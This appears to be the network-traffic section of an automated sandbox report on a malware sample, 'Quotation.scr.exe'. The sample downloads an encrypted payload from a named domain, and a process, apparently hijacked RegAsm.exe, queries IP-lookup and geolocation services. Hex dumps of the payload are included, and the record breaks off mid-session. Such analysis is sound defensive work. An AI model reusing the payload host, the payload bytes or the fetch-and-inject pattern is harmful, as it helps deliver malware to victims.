                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.649730132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:30.124146938 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Sep 9, 2024 08:55:33.020287991 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.649732132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:33.611428976 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Sep 9, 2024 08:55:34.359699965 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:34 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649710135.181.160.464433108C:\Users\user\Desktop\Quotation.scr.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:54:56 UTC72OUTGET /Mytiypg.vdf HTTP/1.1
                                        Host: eg-mart.com
                                        Connection: Keep-Alive
                                        2024-09-09 06:54:56 UTC182INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Mon, 09 Sep 2024 06:54:56 GMT
                                        Content-Length: 931848
                                        Connection: close
                                        Last-Modified: Mon, 09 Sep 2024 00:40:10 GMT
                                        Accept-Ranges: bytes
                                        2024-09-09 06:54:56 UTC16202INData Raw: 8b a6 3a b4 3b d0 03 75 e3 14 31 43 9e bc 92 91 d6 c2 42 72 ca e1 4a 39 b6 ff 88 3a b3 51 cf 13 2e c6 3e 7d f1 f6 47 7f d7 eb 48 37 9e 94 40 0d ec 4d ee 42 68 68 d6 41 b0 ed 10 00 9a 2f f2 ed ec d8 78 28 8c 49 75 a4 93 da 23 8e ec d2 ad 9f dc dc a8 53 aa c7 31 fc 78 91 fa 36 de 50 f8 43 39 35 73 6c 32 db f1 e1 d0 ba 65 e4 af 3e cd 3e 9d 8d fd 58 ef 38 4b d0 9b 0a 50 99 ef 18 cd 0f 86 6c 56 23 4f 2f 01 98 30 e9 8d df 10 74 ca 77 5c 87 fb 46 14 86 28 29 97 c2 b4 a3 b5 3b 8d d2 7f 47 ce ec f6 57 89 5e f7 a2 37 8e 60 b9 0b 70 7d 77 34 7f b4 be 53 5a 54 e5 7d 45 b7 bf 8b 2d 35 67 79 f9 8e 3c 9f 24 1b 99 af 6c 5b 85 db ac 60 7a f7 a5 63 76 0b c4 c0 de 19 40 9b f0 36 90 27 f5 9f 8e a2 6c 74 8b 30 d0 ec ed 90 7d be 51 c2 1e 72 53 4c 01 5e 22 f1 50 ec 85 e9 f5 39
                                        Data Ascii: :;u1CBrJ9:Q.>}GH7@MBhhA/x(Iu#S1x6PC95sl2e>>X8KPlV#O/0tw\F();GW^7`p}w4SZT}E-5gy<$l[`zcv@6'lt0}QrSL^"P9
                                        2024-09-09 06:54:56 UTC16384INData Raw: 92 0b d3 09 46 9c 79 0c 3b 7a c4 14 c9 6b 42 92 e3 77 11 ef 90 7e d1 29 cf 14 39 69 03 4a c1 b6 c8 00 5f 42 93 09 86 3f a2 fe 49 28 4b 67 94 70 2d 3f c4 29 6e c9 2f c6 61 1d 06 7d bf fd 1c f4 8c 48 a4 5e dc c5 bc 3a 49 77 1a 64 11 f7 e3 78 ac 67 e5 b0 13 27 ee 39 45 35 f3 d3 61 11 39 e5 9a 9c ad 89 67 9c 51 41 c7 45 25 b4 46 4e 68 12 ef af 80 a6 6e bc 9d 77 68 e9 c7 3a 29 6a 1c ea 85 47 b8 e6 56 7e 64 55 87 f4 13 83 a4 df 1f 66 b2 28 4d 04 c8 17 2f bf 2a 36 4a fc da 9b 80 ab a6 f6 01 e2 f9 a2 0a 5c a3 c3 5f ec ab 09 10 db ab 58 aa b5 d0 76 24 1c 9a 25 c1 41 85 59 14 99 8b 69 08 f7 ac db 51 b5 1c 48 b7 e4 7b 66 13 6f 7c 3c d7 cb a4 03 96 be 95 e8 cf 9f 4f f2 7c 1e bb 8f 12 d3 4f e0 22 e0 9c 4f 52 ac 2b 3b b1 00 5c b9 2e 44 a3 96 86 7b 9e 4b f9 71 51 de c8
                                        Data Ascii: Fy;zkBw~)9iJ_B?I(Kgp-?)n/a}H^:Iwdxg'9E5a9gQAE%FNhnwh:)jGV~dUf(M/*6J\_Xv$%AYiQH{fo|<O|O"OR+;\.D{KqQ
                                        2024-09-09 06:54:56 UTC16384INData Raw: 8d 06 7e 17 95 72 d4 70 c1 6f 07 7f 38 c4 11 ba 68 c9 f5 ed c4 44 f6 02 a6 80 ed fc 94 f1 1b 41 2e d6 87 f4 78 42 71 0f e3 91 6a 4b a9 cb ae ec 89 e2 ca 26 9e 28 d5 c0 d8 36 73 9b 8a 22 99 4a eb 54 c4 d0 90 6e 71 86 7b c1 1a 70 17 02 c4 ce cc 06 33 e7 ce 08 31 a0 68 3a 6d ba 8a e9 dd cc 7d 2f e5 5a ce 06 4d b4 13 37 a0 94 eb 28 ab 27 8c bb 18 8e ce 94 97 a2 6f 22 96 34 71 41 1b ad bd e4 6d 29 8b 48 71 61 f0 39 3e f2 04 07 14 7b 0a 22 df a7 b9 7d ac 35 15 1e 8c a8 90 33 6e fe b3 4f 51 65 bd 4c 33 e4 4f d5 b0 23 fe 5e 1d d9 86 6b e3 c1 f7 f6 91 2b ff 53 40 39 7e f8 ce fb 8c 3d 8b e9 4a 00 55 66 90 a0 56 4d b1 67 f5 7f e9 29 d9 94 d9 a1 dc 42 70 83 9c e9 28 34 40 89 bd da 78 bc 47 8a c8 ea 1c 93 06 4a d0 a0 6a ea a6 3e 92 49 6f cb de ee 01 28 e0 72 49 a0 b3
                                        Data Ascii: ~rpo8hDA.xBqjK&(6s"JTnq{p31h:m}/ZM7('o"4qAm)Hqa9>{"}53nOQeL3O#^k+S@9~=JUfVMg)Bp(4@xGJj>Io(rI
                                        2024-09-09 06:54:56 UTC16384INData Raw: 89 70 19 6d 25 fa 6e ff 1e 43 c2 fe 4f a1 b9 dd b8 9b 80 fa d2 15 c5 16 e4 10 00 36 72 ba fe a3 a3 8d 5f b9 f7 b6 f5 c7 d0 e5 bf 44 ec 60 72 0a 0a 1e 05 64 ff c4 9a 7e 73 1a 44 af ce 51 3f 0e 1a 6c b8 c6 cc 13 17 b2 27 8e 4f 1d 16 fb 11 58 c1 2e ee 2c a3 15 e6 6f 40 70 bb 25 aa 6d 85 5e 3a 66 16 05 ed f0 2c 00 89 91 45 ed 32 1e a8 ec e8 20 5e 49 f9 be 3f 75 7b c9 2f 11 69 8d 2a 78 08 c1 a1 31 d1 06 dd 70 64 ba c1 e6 d1 17 18 2f be c1 44 70 9a e3 00 e4 3f b9 45 e5 4a 05 71 b6 32 26 16 9a fd 50 1a 22 30 66 2e 47 ce d5 2a 77 05 9b d7 79 58 9c 3e 47 97 e0 da 40 99 be 82 39 cc 98 bd 08 61 ff 10 73 76 35 64 bb 0e 25 7d 9e 6d 4a ca ed 82 d2 e7 0f 54 9c 86 ae 55 62 b3 f6 c7 f7 a9 30 71 80 8e ec f2 7e 41 9d d7 1c 05 f5 ab d2 ba 33 00 bf d9 e1 86 cc 1f e8 5e 17 07
                                        Data Ascii: pm%nCO6r_D`rd~sDQ?l'OX.,o@p%m^:f,E2 ^I?u{/i*x1pd/Dp?EJq2&P"0f.G*wyX>G@9asv5d%}mJTUb0q~A3^
                                        2024-09-09 06:54:56 UTC16384INData Raw: bc 46 c6 7d 3c f6 e2 33 97 cf 77 6c 5b 26 62 e7 41 37 31 e6 a5 96 77 97 e5 56 8c a9 00 86 99 bd b0 df f1 dd d5 04 53 ce 5f 96 69 d1 db 70 0b 0b ce ef ad b1 4a fc 91 cc ed f0 56 17 9a 14 97 97 3c 47 e6 66 aa 83 2b 0b 35 71 74 bd 51 46 13 d4 f2 a2 c0 7a d0 20 95 bd 30 10 ff e1 70 60 75 a5 d3 c4 a3 6b b6 2f d6 6d 51 b8 94 e0 1f 61 7a 53 80 20 cf 68 ac 32 cb 24 70 80 75 96 1f a7 59 93 85 13 bc d0 cd 9d 9a a4 40 76 90 2c e8 a3 05 b7 49 19 cd 73 e1 86 38 7f de 41 33 f6 a0 23 9e ab 9d 58 74 d6 af cb 9e a0 dd 94 a8 50 89 df 18 5a 4a c1 ff 69 dc c1 8d 47 79 db 14 fb 9e 8b d1 8b db cc 23 28 b1 6c a7 7e 55 0d ca eb 17 c8 ba 30 7e 01 30 89 49 ea 39 f2 f2 f0 de 53 af 2d c6 9c 04 85 a5 73 13 12 17 06 49 a4 e6 e6 b7 32 8a 18 64 03 3b fc 1b 1a 71 c9 5f 12 b1 30 82 42 95
                                        Data Ascii: F}<3wl[&bA71wVS_ipJV<Gf+5qtQFz 0p`uk/mQazS h2$puY@v,Is8A3#XtPZJiGy#(l~U0~0I9S-sI2d;q_0B
                                        2024-09-09 06:54:56 UTC16384INData Raw: 9e a2 fb 49 10 be 9d 2f 1d 1c 2b 81 ac 72 78 b2 fd 85 d9 ac 51 84 d4 3d 31 82 f3 52 61 08 07 5e cf 25 40 f5 52 c1 bc 65 67 05 db b9 1f 28 d2 66 8c 74 a2 ba 3a 3c 33 60 bf cd 18 f7 cb 52 3b 28 e9 f3 34 29 27 f1 8c e7 bd 97 a1 ec 0a ae 84 bb 1f aa 41 c7 74 6e 8a 30 53 32 20 30 5d b9 c4 9f ca 50 aa 98 db 31 cc 30 28 c2 94 07 7c f0 fe 4d 5f b5 5b 93 25 92 99 54 34 f6 80 98 99 d4 05 d8 83 d5 66 e7 23 11 fe 48 54 d3 85 9d 2c dd 4e 84 e6 0f 94 af 7f 3f a8 c8 6a 71 7d e7 fe 2c 63 51 ef 06 0a 84 38 81 ee 90 13 10 53 2d 9f 62 6d f0 34 9b 19 5e 30 20 a0 9a bd 8a c7 9f 8d 38 c2 16 a0 2a 5d ad bf c9 12 9f 42 5a 54 7a 7d 61 31 b4 1f 9b 11 70 b6 35 1d 94 4b bc a7 c6 80 c0 01 9a 88 62 bb 02 08 d8 a5 88 1f 45 fc db 23 9f c2 76 6a 4b e0 a6 0d 4c 44 53 c8 5d 64 a9 8e 01 0e
                                        Data Ascii: I/+rxQ=1Ra^%@Reg(ft:<3`R;(4)'Atn0S2 0]P10(|M_[%T4f#HT,N?jq},cQ8S-bm4^0 8*]BZTz}a1p5KbE#vjKLDS]d
                                        2024-09-09 06:54:56 UTC16384INData Raw: 67 e9 e5 c2 80 55 7a a1 e3 0b 8b 0f 87 7a da 7b 9b 12 dc 40 77 ec 8c ab 11 c8 39 35 74 13 ef 67 ae 63 0f f5 f3 a1 1a f3 ff 29 f4 08 c1 5b f8 03 d1 8e 3c 5e 81 50 6e 72 a1 2b 62 19 15 cb c8 52 c6 ef 7f f5 3c ee 5c 72 3a 9e b5 50 d7 90 3b ed bf 0c c3 7f f5 14 23 70 89 0f 69 83 20 76 8b ee 25 c9 45 bb 20 0f a0 e2 32 f6 7f 7d f3 ec a2 58 2c 8a b9 9a 6d 18 93 75 ea a3 c9 60 c0 9f 5b 2e a4 21 d5 85 24 1c 1f c2 91 a6 49 6b 57 b0 a7 28 9a 8e 5d 9f 62 33 3b 06 76 a2 76 8d 8f cc 0f 02 4b c0 a3 2a b0 e4 f6 46 9b a0 1a ca 23 e5 a6 ba 4c 41 7a 8a 5c e9 a4 6d f4 51 1f b0 2b 32 5f fc da f4 5a bf 4d 70 f7 3e f3 69 2a 3d 82 0e 20 ec aa 41 ea 01 2c d7 14 00 01 25 90 57 66 e6 ce f0 f5 3c 9d 0c 9a 31 4a 25 eb 3d 97 74 9b b8 f9 c8 5a 20 25 ad 83 14 07 a1 b2 bb 02 7a 3d 4a a4
                                        Data Ascii: gUzz{@w95tgc)[<^Pnr+bR<\r:P;#pi v%E 2}X,mu`[.!$IkW(]b3;vvK*F#LAz\mQ+2_ZMp>i*= A,%Wf<1J%=tZ %z=J
                                        2024-09-09 06:54:56 UTC16384INData Raw: 27 49 c6 88 d1 4d 5f ea 23 54 6b 7e 35 03 10 c5 bb f4 a5 fa 1a e8 86 9e 57 38 9d 52 f8 92 3e 16 a1 9e b9 0e fc e0 8d b3 a6 bf a2 d3 6c 27 6c fd a6 18 4f 71 d5 f1 69 10 e9 6e e7 b1 41 39 90 bf d7 15 f3 9f 5e 9a 55 d0 79 c1 5c df 27 4d d4 d9 b2 c8 40 bf 45 ed e7 95 5e 73 17 79 c1 e1 ad 7a 82 a8 ee 79 e7 aa ed 19 f9 1c 61 6e 5e 37 f8 9c 2b 24 2a 30 33 78 f5 8e 9e b7 aa e4 33 5e 0c 03 97 75 3e 9c 55 d5 b3 57 ae 3d c0 9f f4 8f fe 81 3b 70 b8 22 f4 86 89 94 ac 80 f7 1c 63 68 1c 7e 8b b4 74 eb 5f 0a 24 6a 49 b9 e4 ec da fa bd fc e2 e1 14 50 15 ce b2 19 5d e6 de dd f0 f7 d2 9e bd ce f0 8e 20 f1 a7 12 5d fd 88 70 c6 40 be ba d1 aa 1d 40 d9 2f 77 f1 02 b4 dd 95 64 cd 64 17 10 c0 2b c3 20 57 17 39 1f 5b 53 79 95 3f d6 64 26 61 22 6f d4 50 a7 18 ec f3 7e a2 a0 94 b1
                                        Data Ascii: 'IM_#Tk~5W8R>l'lOqinA9^Uy\'M@E^syzyan^7+$*03x3^u>UW=;p"ch~t_$jIP] ]p@@/wdd+ W9[Sy?d&a"oP~
                                        2024-09-09 06:54:56 UTC16384INData Raw: de ce 17 94 1f 53 14 8a 67 35 1f d5 69 38 cd 2a 43 3d 9c b0 b5 5f f6 f6 03 68 a1 97 81 52 fb 03 5f 7e 9f 46 f5 42 e0 b1 98 ee 3c dc 90 bd 28 71 63 b4 84 54 6e 7e ab 1d 5c 50 1b 62 0e b8 96 b4 4a 46 19 fd 43 fc 87 bf 1e 4e 90 74 21 3b a2 a2 85 82 f1 77 de 5f 08 77 cf 15 c2 40 b7 d8 4f e3 8d a3 0a 17 ca e6 43 b1 56 00 e2 e1 32 77 02 8c 0a c8 62 f2 9d 71 69 0a 29 32 41 41 98 e1 56 1a 6c 52 49 a7 d3 49 2f a8 fa 5d a1 6e ec 0d 72 4b 0c 3f e6 f4 36 61 e7 18 3e cc c0 2a 44 91 00 7a ca ce 89 94 89 19 2c 1b 6f 1c 70 fa f1 cf 75 cf cc c6 ed 44 c5 76 60 d9 43 2a 0a 59 bb 56 8d 28 95 0f 53 a9 6d 8d c2 bf 68 ce 78 92 7b a6 5a 55 f0 6d 06 aa b1 6e 37 6a dd c9 ce bd 3c 70 55 83 4b 5a ef f7 2d 70 32 ba 52 e8 f1 de 8e dc f7 6b a3 2f 6f ad 6c 79 05 fe fa d5 a0 65 b1 22 5d
                                        Data Ascii: Sg5i8*C=_hR_~FB<(qcTn~\PbJFCNt!;w_w@OCV2wbqi)2AAVlRII/]nrK?6a>*Dz,opuDv`C*YV(Smhx{ZUmn7j<pUKZ-p2Rk/olye"]
                                        2024-09-09 06:54:56 UTC16384INData Raw: a7 0c 1e 9e 1f 85 ba 87 ba 0a aa 2b e8 dc 55 90 e1 f1 a0 d3 6a 13 15 80 28 ed 98 63 10 b7 71 9f 85 bd 8e ed b3 26 e6 d1 de 24 40 78 e4 c0 e8 4e 7f 8f 29 3e 30 52 a2 00 90 17 fb 86 d3 68 1a 48 74 9d ec 6f 31 be aa 0d 44 81 e4 8b 90 17 dc 99 65 c0 ca eb 4d ca 90 ff 4e 6f 0e e1 52 c1 ce 74 f6 0d c5 28 6f f8 cb ff 84 77 cc a7 73 0f 56 11 df 2a dc f4 96 b2 d1 0f f7 05 08 f3 90 27 e2 0f 5e 3f e4 05 fa a7 17 e6 a3 d5 dd 63 1e 7b b0 1c 82 d0 a8 03 7a 0f 44 8d 78 d9 d5 89 90 3c f5 d4 ce 50 d9 3a 13 b3 91 55 5d cb 3a d6 01 64 ed c2 97 79 f3 fa 69 60 d4 27 6e ac a4 bb 91 aa b5 9a 47 20 57 da 17 a5 c0 25 b4 18 e0 31 a9 bd ea 2d ed 31 0f f3 0d a5 72 d2 a8 1e fa b8 5b ae 61 42 1e 34 53 3b 7d f8 20 bb 48 38 88 63 12 be c2 d8 e6 b8 36 1a d8 b8 2a 97 29 69 87 45 0d ca 71
                                        Data Ascii: +Uj(cq&$@xN)>0RhHto1DeMNoRt(owsV*'^?c{zDx<P:U]:dyi`'nG W%1-1r[aB4S;} H8c6*)iEq


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649718188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:16 UTC708INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:16 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19698
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nde1HYyuXVANCSK3qmPCu5Rw7Bm5VvH0CLBA%2FSLVovGicuLA6FpADCkHhB3BeeBUb%2FBQs31J7ngeGWj3JhD%2FOYUXngX%2Bw7eHmIXglFouHC87o2Pp8sfA6PS7aQnuOplwpJw0LgeH"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0545924aec8cc0-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.649719188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:17 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-09-09 06:55:17 UTC706INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:17 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19699
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hgOrTaSmOTQN4ooZqll8zRP7F3hg8AxZXthiIHID0vXpZQzXTV2sI95uqBD5%2FnFqIg13Hl%2FQ0htebj8SnIldEghM9P%2B7dU6rRCtnKd5C2bpTe1Nmbx0jPdQmpWJMDKelqqkpu8M"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c054597fe660f7c-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.649721188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:19 UTC708INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:19 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19701
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ROaNspNS%2Bbj1kiFgeaj8HldHTYToeH25O5yR%2BGWJejNrQCVC1UU1FWexIpDaS2SS%2B8we%2BIf7EQjHReEToVYkEjZPdQogcb7sh2N8PJck1YqVSSXjaClEvU2uCkD5GQ23LoBDzFm"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0545a0bd8319ef-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.649724188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
